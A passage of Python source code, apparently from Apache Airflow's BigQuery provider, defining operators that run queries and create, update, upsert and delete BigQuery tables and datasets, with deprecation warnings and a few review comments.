    :param destination_dataset_table: dotted ``(<project>.)<dataset>.<table>``
        to store the query results, if any.
    Remaining parameters are forwarded unchanged to ``BigQueryHook.run_query``;
    see that hook for their semantics.
    """

    template_fields = (
        'sql',
        'destination_dataset_table',
        'labels',
        'query_params',
        'impersonation_chain',
    )
    template_ext = ('.sql',)
    ui_color = BigQueryUIColors.QUERY.value

    @property
    def operator_extra_links(self):
        """Console link(s): a single link for one statement, one per statement otherwise."""
        if isinstance(self.sql, str):
            return (BigQueryConsoleLink(),)
        return (BigQueryConsoleIndexableLink(i) for i, _ in enumerate(self.sql))

    @apply_defaults
    def __init__(
        self,
        *,
        sql: Union[str, Iterable],
        destination_dataset_table: Optional[str] = None,
        write_disposition: str = 'WRITE_EMPTY',
        allow_large_results: Optional[bool] = False,
        flatten_results: Optional[bool] = None,
        gcp_conn_id: str = 'google_cloud_default',
        bigquery_conn_id: Optional[str] = None,
        delegate_to: Optional[str] = None,
        udf_config: Optional[list] = None,
        use_legacy_sql: bool = True,
        maximum_billing_tier: Optional[int] = None,
        maximum_bytes_billed: Optional[float] = None,
        create_disposition: str = 'CREATE_IF_NEEDED',
        schema_update_options: Optional[Union[list, tuple, set]] = None,
        query_params: Optional[list] = None,
        labels: Optional[dict] = None,
        priority: str = 'INTERACTIVE',
        time_partitioning: Optional[dict] = None,
        api_resource_configs: Optional[dict] = None,
        cluster_fields: Optional[List[str]] = None,
        location: Optional[str] = None,
        encryption_configuration: Optional[dict] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        if bigquery_conn_id:
            warnings.warn(
                "The bigquery_conn_id parameter has been deprecated. You should pass "
                "the gcp_conn_id parameter.",
                DeprecationWarning,
            )
            gcp_conn_id = bigquery_conn_id
        # The whole operator is deprecated in favour of BigQueryInsertJobOperator.
        warnings.warn(
            "This operator is deprecated. Please use `BigQueryInsertJobOperator`.",
            DeprecationWarning,
        )
        self.sql = sql
        self.destination_dataset_table = destination_dataset_table
        self.write_disposition = write_disposition
        self.create_disposition = create_disposition
        self.allow_large_results = allow_large_results
        self.flatten_results = flatten_results
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.udf_config = udf_config
        self.use_legacy_sql = use_legacy_sql
        self.maximum_billing_tier = maximum_billing_tier
        self.maximum_bytes_billed = maximum_bytes_billed
        self.schema_update_options = schema_update_options
        self.query_params = query_params
        self.labels = labels
        self.priority = priority
        self.time_partitioning = time_partitioning
        self.api_resource_configs = api_resource_configs
        self.cluster_fields = cluster_fields
        self.location = location
        self.encryption_configuration = encryption_configuration
        # Created lazily in execute(); used by on_kill() to cancel the query.
        self.hook = None
        self.impersonation_chain = impersonation_chain

    def execute(self, context):
        """Run the configured quer(y/ies) and push the resulting job id(s) to XCom."""
        if self.hook is None:
            self.log.info('Executing: %s', self.sql)
            self.hook = BigQueryHook(
                gcp_conn_id=self.gcp_conn_id,
                use_legacy_sql=self.use_legacy_sql,
                delegate_to=self.delegate_to,
                location=self.location,
                impersonation_chain=self.impersonation_chain,
            )
        if isinstance(self.sql, str):
            job_id = self.hook.run_query(
                sql=self.sql,
                destination_dataset_table=self.destination_dataset_table,
                write_disposition=self.write_disposition,
                allow_large_results=self.allow_large_results,
                flatten_results=self.flatten_results,
                udf_config=self.udf_config,
                maximum_billing_tier=self.maximum_billing_tier,
                maximum_bytes_billed=self.maximum_bytes_billed,
                create_disposition=self.create_disposition,
                query_params=self.query_params,
                labels=self.labels,
                schema_update_options=self.schema_update_options,
                priority=self.priority,
                time_partitioning=self.time_partitioning,
                api_resource_configs=self.api_resource_configs,
                cluster_fields=self.cluster_fields,
                encryption_configuration=self.encryption_configuration,
            )
        elif isinstance(self.sql, Iterable):
            job_id = [
                self.hook.run_query(
                    sql=s,
                    destination_dataset_table=self.destination_dataset_table,
                    write_disposition=self.write_disposition,
                    allow_large_results=self.allow_large_results,
                    flatten_results=self.flatten_results,
                    udf_config=self.udf_config,
                    maximum_billing_tier=self.maximum_billing_tier,
                    maximum_bytes_billed=self.maximum_bytes_billed,
                    create_disposition=self.create_disposition,
                    query_params=self.query_params,
                    labels=self.labels,
                    schema_update_options=self.schema_update_options,
                    priority=self.priority,
                    time_partitioning=self.time_partitioning,
                    api_resource_configs=self.api_resource_configs,
                    cluster_fields=self.cluster_fields,
                    encryption_configuration=self.encryption_configuration,
                )
                for s in self.sql
            ]
        else:
            # Bug fix: report the actual type of ``self.sql`` (the original
            # interpolated ``type(str)``, i.e. the literal class ``str``).
            raise AirflowException(f"argument 'sql' of type {type(self.sql)} is neither a string nor an iterable")
        context['task_instance'].xcom_push(key='job_id', value=job_id)

    def on_kill(self) -> None:
        """Cancel a running query when the task is externally killed."""
        super().on_kill()
        if self.hook is not None:
            self.log.info('Cancelling running query')
            self.hook.cancel_query()
class BigQueryCreateEmptyTableOperator(BaseOperator):
    """Create a new (empty) table, view or materialized view in a BigQuery dataset.

    The schema may be given inline (``schema_fields``), as a JSON object in GCS
    (``gcs_schema_object``), or embedded in a full ``table_resource`` dict.
    A ``Conflict`` from the API is logged, not raised, when the table exists.
    """

    template_fields = (
        'dataset_id',
        'table_id',
        'project_id',
        'gcs_schema_object',
        'labels',
        'view',
        'materialized_view',
        'impersonation_chain',
    )
    template_fields_renderers = {"table_resource": "json", "materialized_view": "json"}
    ui_color = BigQueryUIColors.TABLE.value

    @apply_defaults
    def __init__(
        self,
        *,
        dataset_id: str,
        table_id: str,
        table_resource: Optional[Dict[str, Any]] = None,
        project_id: Optional[str] = None,
        schema_fields: Optional[List] = None,
        gcs_schema_object: Optional[str] = None,
        time_partitioning: Optional[Dict] = None,
        bigquery_conn_id: str = 'google_cloud_default',
        google_cloud_storage_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        labels: Optional[Dict] = None,
        view: Optional[Dict] = None,
        materialized_view: Optional[Dict] = None,
        encryption_configuration: Optional[Dict] = None,
        location: Optional[str] = None,
        cluster_fields: Optional[List[str]] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        exists_ok: bool = False,
        **kwargs,
    ) -> None:
        """Store the table definition parameters verbatim for execute()."""
        super().__init__(**kwargs)
        self.project_id = project_id
        self.dataset_id = dataset_id
        self.table_id = table_id
        self.schema_fields = schema_fields
        self.gcs_schema_object = gcs_schema_object
        self.bigquery_conn_id = bigquery_conn_id
        self.google_cloud_storage_conn_id = google_cloud_storage_conn_id
        self.delegate_to = delegate_to
        # Avoid a shared mutable default by normalising None to a fresh dict.
        self.time_partitioning = {} if time_partitioning is None else time_partitioning
        self.labels = labels
        self.view = view
        self.materialized_view = materialized_view
        self.encryption_configuration = encryption_configuration
        self.location = location
        self.cluster_fields = cluster_fields
        self.table_resource = table_resource
        self.impersonation_chain = impersonation_chain
        self.exists_ok = exists_ok

    def execute(self, context) -> None:
        """Resolve the schema (inline or from GCS) and create the table."""
        bq_hook = BigQueryHook(
            gcp_conn_id=self.bigquery_conn_id,
            delegate_to=self.delegate_to,
            location=self.location,
            impersonation_chain=self.impersonation_chain,
        )
        if not self.schema_fields and self.gcs_schema_object:
            # Schema lives in a GCS object: download and parse it as JSON.
            gcs_bucket, gcs_object = _parse_gcs_url(self.gcs_schema_object)
            gcs_hook = GCSHook(
                gcp_conn_id=self.google_cloud_storage_conn_id,
                delegate_to=self.delegate_to,
                impersonation_chain=self.impersonation_chain,
            )
            schema_fields = json.loads(gcs_hook.download(gcs_bucket, gcs_object))
        else:
            schema_fields = self.schema_fields
        try:
            self.log.info('Creating table')
            table = bq_hook.create_empty_table(
                project_id=self.project_id,
                dataset_id=self.dataset_id,
                table_id=self.table_id,
                schema_fields=schema_fields,
                time_partitioning=self.time_partitioning,
                cluster_fields=self.cluster_fields,
                labels=self.labels,
                view=self.view,
                materialized_view=self.materialized_view,
                encryption_configuration=self.encryption_configuration,
                table_resource=self.table_resource,
                exists_ok=self.exists_ok,
            )
            self.log.info(
                'Table %s.%s.%s created successfully', table.project, table.dataset_id, table.table_id
            )
        except Conflict:
            # With exists_ok=False the API raises Conflict; treat it as benign.
            self.log.info('Table %s.%s already exists.', self.dataset_id, self.table_id)
class BigQueryCreateExternalTableOperator(BaseOperator):
    """Create an external BigQuery table pointing at data stored in Google Cloud Storage.

    The table can be defined either through the legacy keyword parameters or a
    full ``table_resource`` dict; the two styles are mutually exclusive.
    """

    template_fields = (
        'bucket',
        'source_objects',
        'schema_object',
        'destination_project_dataset_table',
        'labels',
        'table_resource',
        'impersonation_chain',
    )
    template_fields_renderers = {"table_resource": "json"}
    ui_color = BigQueryUIColors.TABLE.value

    @apply_defaults
    def __init__(
        self,
        *,
        bucket: str,
        source_objects: List,
        destination_project_dataset_table: str,
        table_resource: Optional[Dict[str, Any]] = None,
        schema_fields: Optional[List] = None,
        schema_object: Optional[str] = None,
        source_format: str = 'CSV',
        compression: str = 'NONE',
        skip_leading_rows: int = 0,
        field_delimiter: str = ',',
        max_bad_records: int = 0,
        quote_character: Optional[str] = None,
        allow_quoted_newlines: bool = False,
        allow_jagged_rows: bool = False,
        bigquery_conn_id: str = 'google_cloud_default',
        google_cloud_storage_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        src_fmt_configs: Optional[dict] = None,
        labels: Optional[Dict] = None,
        encryption_configuration: Optional[Dict] = None,
        location: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        """Store the table definition; warn about the legacy keyword style."""
        super().__init__(**kwargs)
        self.bucket = bucket
        self.source_objects = source_objects
        self.schema_object = schema_object
        # Whether any legacy keyword-style table parameter was supplied.
        # NOTE(review): destination_project_dataset_table is required and
        # source_format/compression/field_delimiter have truthy defaults, so this
        # is always True — combined with the check below, passing table_resource
        # always raises ValueError. Confirm intended behaviour before relying on it.
        kwargs_passed = any(
            [
                destination_project_dataset_table,
                schema_fields,
                source_format,
                compression,
                skip_leading_rows,
                field_delimiter,
                max_bad_records,
                quote_character,
                allow_quoted_newlines,
                allow_jagged_rows,
                src_fmt_configs,
                labels,
                encryption_configuration,
            ]
        )
        if not table_resource:
            warnings.warn(
                "Passing table parameters via keywords arguments will be deprecated. "
                "Please use provide table definition using `table_resource` parameter."
                "You can still use external `schema_object`. ",
                DeprecationWarning,
                stacklevel=2,
            )
        # The two definition styles are mutually exclusive.
        if table_resource and kwargs_passed:
            raise ValueError("You provided both `table_resource` and exclusive keywords arguments.")
        self.table_resource = table_resource
        self.destination_project_dataset_table = destination_project_dataset_table
        self.schema_fields = schema_fields
        self.source_format = source_format
        self.compression = compression
        self.skip_leading_rows = skip_leading_rows
        self.field_delimiter = field_delimiter
        self.max_bad_records = max_bad_records
        self.quote_character = quote_character
        self.allow_quoted_newlines = allow_quoted_newlines
        self.allow_jagged_rows = allow_jagged_rows
        self.bigquery_conn_id = bigquery_conn_id
        self.google_cloud_storage_conn_id = google_cloud_storage_conn_id
        self.delegate_to = delegate_to
        self.src_fmt_configs = src_fmt_configs or {}
        self.labels = labels
        self.encryption_configuration = encryption_configuration
        self.location = location
        self.impersonation_chain = impersonation_chain

    def execute(self, context) -> None:
        """Resolve the schema and create the external table via the hook."""
        bq_hook = BigQueryHook(
            gcp_conn_id=self.bigquery_conn_id,
            delegate_to=self.delegate_to,
            location=self.location,
            impersonation_chain=self.impersonation_chain,
        )
        # DATASTORE_BACKUP sources carry their own schema, so skip the download.
        if not self.schema_fields and self.schema_object and self.source_format != 'DATASTORE_BACKUP':
            gcs_hook = GCSHook(
                gcp_conn_id=self.google_cloud_storage_conn_id,
                delegate_to=self.delegate_to,
                impersonation_chain=self.impersonation_chain,
            )
            schema_fields = json.loads(gcs_hook.download(self.bucket, self.schema_object))
        else:
            schema_fields = self.schema_fields
        if schema_fields and self.table_resource:
            # Inject the downloaded schema into the provided resource dict.
            self.table_resource["externalDataConfiguration"]["schema"] = schema_fields
        if self.table_resource:
            tab_ref = TableReference.from_string(self.destination_project_dataset_table)
            bq_hook.create_empty_table(
                table_resource=self.table_resource,
                project_id=tab_ref.project,
                table_id=tab_ref.table_id,
                dataset_id=tab_ref.dataset_id,
            )
        else:
            source_uris = [f"gs://{self.bucket}/{source_object}" for source_object in self.source_objects]
            bq_hook.create_external_table(
                external_project_dataset_table=self.destination_project_dataset_table,
                schema_fields=schema_fields,
                source_uris=source_uris,
                source_format=self.source_format,
                compression=self.compression,
                skip_leading_rows=self.skip_leading_rows,
                field_delimiter=self.field_delimiter,
                max_bad_records=self.max_bad_records,
                quote_character=self.quote_character,
                allow_quoted_newlines=self.allow_quoted_newlines,
                allow_jagged_rows=self.allow_jagged_rows,
                src_fmt_configs=self.src_fmt_configs,
                labels=self.labels,
                encryption_configuration=self.encryption_configuration,
            )
class BigQueryDeleteDatasetOperator(BaseOperator):
    """Delete an existing BigQuery dataset, optionally together with its contents."""

    template_fields = ('dataset_id', 'project_id', 'impersonation_chain')
    ui_color = BigQueryUIColors.DATASET.value

    @apply_defaults
    def __init__(
        self,
        *,
        dataset_id: str,
        project_id: Optional[str] = None,
        delete_contents: bool = False,
        gcp_conn_id: str = 'google_cloud_default',
        bigquery_conn_id: Optional[str] = None,
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        """Store deletion settings; honour the deprecated connection alias."""
        if bigquery_conn_id:
            warnings.warn(
                "The bigquery_conn_id parameter has been deprecated. You should pass "
                "the gcp_conn_id parameter.",
                DeprecationWarning,
                stacklevel=3,
            )
            gcp_conn_id = bigquery_conn_id
        self.dataset_id = dataset_id
        self.project_id = project_id
        self.delete_contents = delete_contents
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.impersonation_chain = impersonation_chain
        super().__init__(**kwargs)

    def execute(self, context) -> None:
        """Delete the dataset through a BigQuery hook."""
        self.log.info('Dataset id: %s Project id: %s', self.dataset_id, self.project_id)
        hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        hook.delete_dataset(
            project_id=self.project_id, dataset_id=self.dataset_id, delete_contents=self.delete_contents
        )
class BigQueryCreateEmptyDatasetOperator(BaseOperator):
    """Create a new, empty BigQuery dataset; an existing one is logged, not an error."""

    template_fields = ('dataset_id', 'project_id', 'dataset_reference', 'impersonation_chain')
    template_fields_renderers = {"dataset_reference": "json"}
    ui_color = BigQueryUIColors.DATASET.value

    @apply_defaults
    def __init__(
        self,
        *,
        dataset_id: Optional[str] = None,
        project_id: Optional[str] = None,
        dataset_reference: Optional[Dict] = None,
        location: Optional[str] = None,
        gcp_conn_id: str = 'google_cloud_default',
        bigquery_conn_id: Optional[str] = None,
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        exists_ok: bool = False,
        **kwargs,
    ) -> None:
        """Store dataset settings; honour the deprecated connection alias."""
        if bigquery_conn_id:
            warnings.warn(
                "The bigquery_conn_id parameter has been deprecated. You should pass "
                "the gcp_conn_id parameter.",
                DeprecationWarning,
                stacklevel=3,
            )
            gcp_conn_id = bigquery_conn_id
        self.dataset_id = dataset_id
        self.project_id = project_id
        self.location = location
        self.dataset_reference = dataset_reference or {}
        self.exists_ok = exists_ok
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.impersonation_chain = impersonation_chain
        super().__init__(**kwargs)

    def execute(self, context) -> None:
        """Create the dataset; on Conflict just log that it already exists."""
        hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            location=self.location,
            impersonation_chain=self.impersonation_chain,
        )
        try:
            hook.create_empty_dataset(
                project_id=self.project_id,
                dataset_id=self.dataset_id,
                dataset_reference=self.dataset_reference,
                location=self.location,
                exists_ok=self.exists_ok,
            )
        except Conflict:
            dataset_id = self.dataset_reference.get("datasetReference", {}).get("datasetId", self.dataset_id)
            self.log.info('Dataset %s already exists.', dataset_id)
class BigQueryGetDatasetOperator(BaseOperator):
    """Fetch a dataset and return its API representation as a dict."""

    template_fields = ('dataset_id', 'project_id', 'impersonation_chain')
    ui_color = BigQueryUIColors.DATASET.value

    @apply_defaults
    def __init__(
        self,
        *,
        dataset_id: str,
        project_id: Optional[str] = None,
        gcp_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        """Store dataset lookup settings."""
        self.dataset_id = dataset_id
        self.project_id = project_id
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.impersonation_chain = impersonation_chain
        super().__init__(**kwargs)

    def execute(self, context):
        """Return the dataset resource as a plain dict."""
        self.log.info('Start getting dataset: %s:%s', self.project_id, self.dataset_id)
        hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        dataset = hook.get_dataset(dataset_id=self.dataset_id, project_id=self.project_id)
        return dataset.to_api_repr()
class BigQueryGetDatasetTablesOperator(BaseOperator):
    """List tables in a dataset, optionally capped at ``max_results``."""

    template_fields = ('dataset_id', 'project_id', 'impersonation_chain')
    ui_color = BigQueryUIColors.DATASET.value

    @apply_defaults
    def __init__(
        self,
        *,
        dataset_id: str,
        project_id: Optional[str] = None,
        max_results: Optional[int] = None,
        gcp_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        """Store dataset listing settings."""
        self.dataset_id = dataset_id
        self.project_id = project_id
        self.max_results = max_results
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.impersonation_chain = impersonation_chain
        super().__init__(**kwargs)

    def execute(self, context):
        """Return the hook's table listing for the dataset."""
        hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        return hook.get_dataset_tables(
            dataset_id=self.dataset_id,
            project_id=self.project_id,
            max_results=self.max_results,
        )
class BigQueryPatchDatasetOperator(BaseOperator):
    """Patch (partially update) a dataset.

    Deprecated: use ``BigQueryUpdateDatasetOperator`` instead (a warning is
    emitted from ``__init__``).
    """

    template_fields = (
        'dataset_id',
        'project_id',
        'impersonation_chain',
    )
    template_fields_renderers = {"dataset_resource": "json"}
    ui_color = BigQueryUIColors.DATASET.value

    @apply_defaults
    def __init__(
        self,
        *,
        dataset_id: str,
        dataset_resource: dict,
        project_id: Optional[str] = None,
        gcp_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        """Store patch settings and warn that this operator is deprecated."""
        warnings.warn(
            "This operator is deprecated. Please use BigQueryUpdateDatasetOperator.",
            DeprecationWarning,
            stacklevel=3,
        )
        self.dataset_id = dataset_id
        self.project_id = project_id
        self.gcp_conn_id = gcp_conn_id
        self.dataset_resource = dataset_resource
        self.delegate_to = delegate_to
        self.impersonation_chain = impersonation_chain
        super().__init__(**kwargs)

    def execute(self, context):
        """Apply the partial dataset update via the hook's patch API."""
        bq_hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        return bq_hook.patch_dataset(
            dataset_id=self.dataset_id,
            dataset_resource=self.dataset_resource,
            project_id=self.project_id,
        )
class BigQueryUpdateTableOperator(BaseOperator):
    """Update a BigQuery table from a ``table_resource`` dict, limited to ``fields``."""

    template_fields = ('dataset_id', 'table_id', 'project_id', 'impersonation_chain')
    template_fields_renderers = {"table_resource": "json"}
    ui_color = BigQueryUIColors.TABLE.value

    @apply_defaults
    def __init__(
        self,
        *,
        table_resource: Dict[str, Any],
        fields: Optional[List[str]] = None,
        dataset_id: Optional[str] = None,
        table_id: Optional[str] = None,
        project_id: Optional[str] = None,
        gcp_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        """Store the table update settings."""
        self.table_resource = table_resource
        self.fields = fields
        self.dataset_id = dataset_id
        self.table_id = table_id
        self.project_id = project_id
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.impersonation_chain = impersonation_chain
        super().__init__(**kwargs)

    def execute(self, context):
        """Apply the update and return the hook's result."""
        hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        return hook.update_table(
            table_resource=self.table_resource,
            fields=self.fields,
            dataset_id=self.dataset_id,
            table_id=self.table_id,
            project_id=self.project_id,
        )
class BigQueryUpdateDatasetOperator(BaseOperator):
    """Update a dataset from a ``dataset_resource`` dict and return its API repr."""

    template_fields = ('dataset_id', 'project_id', 'impersonation_chain')
    template_fields_renderers = {"dataset_resource": "json"}
    ui_color = BigQueryUIColors.DATASET.value

    @apply_defaults
    def __init__(
        self,
        *,
        dataset_resource: Dict[str, Any],
        fields: Optional[List[str]] = None,
        dataset_id: Optional[str] = None,
        project_id: Optional[str] = None,
        gcp_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        """Store the dataset update settings."""
        self.dataset_resource = dataset_resource
        self.fields = fields
        self.dataset_id = dataset_id
        self.project_id = project_id
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.impersonation_chain = impersonation_chain
        super().__init__(**kwargs)

    def execute(self, context):
        """Update the dataset; defaults ``fields`` to all keys of the resource."""
        hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        fields = self.fields or list(self.dataset_resource)
        dataset = hook.update_dataset(
            dataset_resource=self.dataset_resource,
            project_id=self.project_id,
            dataset_id=self.dataset_id,
            fields=fields,
        )
        return dataset.to_api_repr()
class BigQueryDeleteTableOperator(BaseOperator):
    """Delete a BigQuery table or view, optionally ignoring a missing one."""

    template_fields = ('deletion_dataset_table', 'impersonation_chain')
    ui_color = BigQueryUIColors.TABLE.value

    @apply_defaults
    def __init__(
        self,
        *,
        deletion_dataset_table: str,
        gcp_conn_id: str = 'google_cloud_default',
        bigquery_conn_id: Optional[str] = None,
        delegate_to: Optional[str] = None,
        ignore_if_missing: bool = False,
        location: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        """Store deletion settings; honour the deprecated connection alias."""
        super().__init__(**kwargs)
        if bigquery_conn_id:
            warnings.warn(
                "The bigquery_conn_id parameter has been deprecated. You should pass "
                "the gcp_conn_id parameter.",
                DeprecationWarning,
                stacklevel=3,
            )
            gcp_conn_id = bigquery_conn_id
        self.deletion_dataset_table = deletion_dataset_table
        self.ignore_if_missing = ignore_if_missing
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.location = location
        self.impersonation_chain = impersonation_chain

    def execute(self, context) -> None:
        """Delete the table through the BigQuery hook."""
        self.log.info('Deleting: %s', self.deletion_dataset_table)
        hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            location=self.location,
            impersonation_chain=self.impersonation_chain,
        )
        hook.delete_table(table_id=self.deletion_dataset_table, not_found_ok=self.ignore_if_missing)
class BigQueryUpsertTableOperator(BaseOperator):
    """
    Upsert (create-or-update) a BigQuery table from a ``table_resource`` dict.

    :param dataset_id: The dataset containing the table.
    :param table_resource: Table resource as described in the BigQuery API docs.
    :param project_id: Google Cloud project; hook default if None.
    :param gcp_conn_id: The connection ID used to connect to Google Cloud.
    :param bigquery_conn_id: (deprecated) alias for ``gcp_conn_id``.
    :param delegate_to: Account to impersonate via domain-wide delegation, if any.
    :param location: Location of the job.
    :param impersonation_chain: Optional service account(s) to impersonate using
        short-term credentials.
    """

    template_fields = (
        'dataset_id',
        'table_resource',
        'impersonation_chain',
    )
    template_fields_renderers = {"table_resource": "json"}
    ui_color = BigQueryUIColors.TABLE.value

    @apply_defaults
    def __init__(
        self,
        *,
        dataset_id: str,
        table_resource: dict,
        project_id: Optional[str] = None,
        gcp_conn_id: str = 'google_cloud_default',
        bigquery_conn_id: Optional[str] = None,
        delegate_to: Optional[str] = None,
        location: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        if bigquery_conn_id:
            warnings.warn(
                "The bigquery_conn_id parameter has been deprecated. You should pass "
                "the gcp_conn_id parameter.",
                DeprecationWarning,
                stacklevel=3,
            )
            gcp_conn_id = bigquery_conn_id
        self.dataset_id = dataset_id
        self.table_resource = table_resource
        self.project_id = project_id
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.location = location
        self.impersonation_chain = impersonation_chain

    def execute(self, context) -> None:
        """Run the table upsert through the BigQuery hook."""
        self.log.info('Upserting Dataset: %s with table_resource: %s', self.dataset_id, self.table_resource)
        # Fix: pass the connection id via ``gcp_conn_id`` as every other operator in
        # this module does; the ``bigquery_conn_id=`` keyword is the deprecated alias.
        hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            location=self.location,
            impersonation_chain=self.impersonation_chain,
        )
        hook.run_table_upsert(
            dataset_id=self.dataset_id,
            table_resource=self.table_resource,
            project_id=self.project_id,
        )
class BigQueryUpdateTableSchemaOperator(BaseOperator):
    """Patch fields of an existing table schema.

    ``schema_fields_updates`` (templated, JSON-rendered in the UI) is handed
    straight to ``BigQueryHook.update_table_schema`` together with
    ``include_policy_tags`` and the table coordinates.
    """

    template_fields = (
        'schema_fields_updates',
        'dataset_id',
        'table_id',
        'project_id',
        'impersonation_chain',
    )
    template_fields_renderers = {"schema_fields_updates": "json"}
    ui_color = BigQueryUIColors.TABLE.value

    @apply_defaults
    def __init__(
        self,
        *,
        schema_fields_updates: List[Dict[str, Any]],
        include_policy_tags: Optional[bool] = False,
        dataset_id: Optional[str] = None,
        table_id: Optional[str] = None,
        project_id: Optional[str] = None,
        gcp_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        # Stash all arguments; the hook is built lazily in execute().
        self.schema_fields_updates = schema_fields_updates
        self.include_policy_tags = include_policy_tags
        self.dataset_id = dataset_id
        self.table_id = table_id
        self.project_id = project_id
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.impersonation_chain = impersonation_chain
        super().__init__(**kwargs)

    def execute(self, context):
        """Run the schema update and return the hook's result."""
        hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        return hook.update_table_schema(
            schema_fields_updates=self.schema_fields_updates,
            include_policy_tags=self.include_policy_tags,
            dataset_id=self.dataset_id,
            table_id=self.table_id,
            project_id=self.project_id,
        )
class BigQueryInsertJobOperator(BaseOperator):
    """Execute a BigQuery job described by a raw ``configuration`` dict.

    ``configuration`` is templated; a value ending in ``.json`` is treated as
    a file path and loaded in :meth:`prepare_template`. Job ids are made
    unique with an md5 suffix; on a Conflict (id already exists) the operator
    either reattaches to the existing job — when its state is listed in
    ``reattach_states`` — or raises. ``on_kill`` cancels the submitted job
    unless ``cancel_on_kill`` is False.
    """
    template_fields = (
        "configuration",
        "job_id",
        "impersonation_chain",
    )
    template_ext = (".json",)
    template_fields_renderers = {"configuration": "json"}
    ui_color = BigQueryUIColors.QUERY.value
    @apply_defaults
    def __init__(
        self,
        configuration: Dict[str, Any],
        project_id: Optional[str] = None,
        location: Optional[str] = None,
        job_id: Optional[str] = None,
        force_rerun: bool = True,
        reattach_states: Optional[Set[str]] = None,
        gcp_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        cancel_on_kill: bool = True,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        self.configuration = configuration
        self.location = location
        self.job_id = job_id
        self.project_id = project_id
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.force_rerun = force_rerun
        # None/empty normalizes to an empty set, i.e. never reattach.
        self.reattach_states: Set[str] = reattach_states or set()
        self.impersonation_chain = impersonation_chain
        self.cancel_on_kill = cancel_on_kill
        # Populated in execute(); kept so on_kill() can cancel the job.
        self.hook: Optional[BigQueryHook] = None
    def prepare_template(self) -> None:
        """If ``configuration`` templated to a ``.json`` path, load that file's JSON."""
        if isinstance(self.configuration, str) and self.configuration.endswith('.json'):
            with open(self.configuration) as file:
                self.configuration = json.loads(file.read())
    def _submit_job(
        self,
        hook: BigQueryHook,
        job_id: str,
    ) -> BigQueryJob:
        """Submit the configured job under *job_id* and wait for completion."""
        job = hook.insert_job(
            configuration=self.configuration,
            project_id=self.project_id,
            location=self.location,
            job_id=job_id,
        )
        # result() blocks until the job finishes.
        job.result()
        return job
    @staticmethod
    def _handle_job_error(job: BigQueryJob) -> None:
        """Raise AirflowException when the finished job reports an error_result."""
        if job.error_result:
            raise AirflowException(f"BigQuery job {job.job_id} failed: {job.error_result}")
    def _job_id(self, context):
        """Build the job id to submit under.

        force_rerun salts the id with uuid4 so every run is unique; otherwise
        the id hashes the configuration so identical submissions collide (and
        can be reattached). Falls back to a dag/task/execution-date based id
        when no explicit job_id was given.
        """
